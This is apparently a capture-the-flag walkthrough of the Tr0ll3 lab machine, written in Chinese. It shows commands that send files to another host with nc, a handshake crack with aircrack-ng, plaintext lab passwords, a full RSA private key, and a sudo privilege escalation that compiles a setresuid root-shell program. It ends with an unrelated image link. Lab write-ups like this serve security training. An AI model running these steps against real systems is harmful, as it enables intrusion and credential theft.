信息收集
| IP Address | Opening Ports |
|---|---|
| 192.168.101.147 | TCP:22 |
$ ssh start@192.168.101.147
用户:Start
start@Tr0ll3:~$ find / -type f -perm 0777 2>/tmp/1
start@Tr0ll3:~$ cat /var/log/.dist-manage/wytshadow.cap | nc 192.168.101.128 10035
WIFI握手包
aircrack-ng 破解握手包
start@Tr0ll3:~$ cat /.hints/lol/rofl/roflmao/this/isnt/gonna/stop/anytime/soon/still/going/lol/annoyed/almost/there/jk/no/seriously/last/one/rofl/ok/ill/stop/however/this/is/fun/ok/here/rofl/sorry/you/made/it/gold_star.txt | nc 192.168.101.128 10035
$ aircrack-ng -w gold_star.txt wytshadow.cap
用户:wytshadow
wytshadow:gaUoCe34t1
wytshadow@Tr0ll3:/home/start$ sudo -l
wytshadow@Tr0ll3:/home/start$ cat /etc/nginx/sites-available/default
wytshadow@Tr0ll3:/home/start$ sudo /usr/sbin/service nginx start
wytshadow@Tr0ll3:/home/start$ netstat -lnput
$ lynx http://192.168.101.147:8080
Lynx是一款文本模式的网页浏览器。它最初由Thomas Dickey在1992年开发,旨在为没有图形界面的终端用户提供网页浏览功能。Lynx在Unix和Linux系统上尤其流行,因为它可以通过命令行界面快速浏览网页而不需要图形界面支持
Username: genphlux
Password: HF9nd0cR!
用户:genphlux
genphlux@Tr0ll3:~$ su genphulx
genphlux@Tr0ll3:~$ file maleus
genphlux@Tr0ll3:~$ cat maleus
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv
DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp
yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4
u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN
gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe
eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I
pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l
Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e
SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw
eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G
PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK
kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg
jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g
7BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z
KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb
1cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg
ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng
N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6
syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO
2H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw
EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb
5XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9
xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz
Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA
wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK
-----END RSA PRIVATE KEY-----
用户:maleus
$ chmod 600 key
$ ssh maleus@192.168.101.147 -i id_rsa
maleus@Tr0ll3:~$ cat .viminfo
password:B^slc8I$
权限提升
通过重新编译来获取ROOT权限
maleus@Tr0ll3:~$ echo -e 'int main (void){setresuid(0, 0, 0);system("/bin/sh");}'>dont_even_bother.c
maleus@Tr0ll3:~$ rm dont_even_bother
maleus@Tr0ll3:~$ gcc dont_even_bother.c -o dont_even_bother
maleus@Tr0ll3:~$ sudo /home/maleus/dont_even_bother
# cat /root/flag.txt
Pr00fThatTh3L33tHax0rG0tTheFl@g!!
![[译] Rust标准库有些特殊,让我们改它](https://img-blog.csdnimg.cn/img_convert/15bf5e6a9b94f510de66855e256595c7.png)
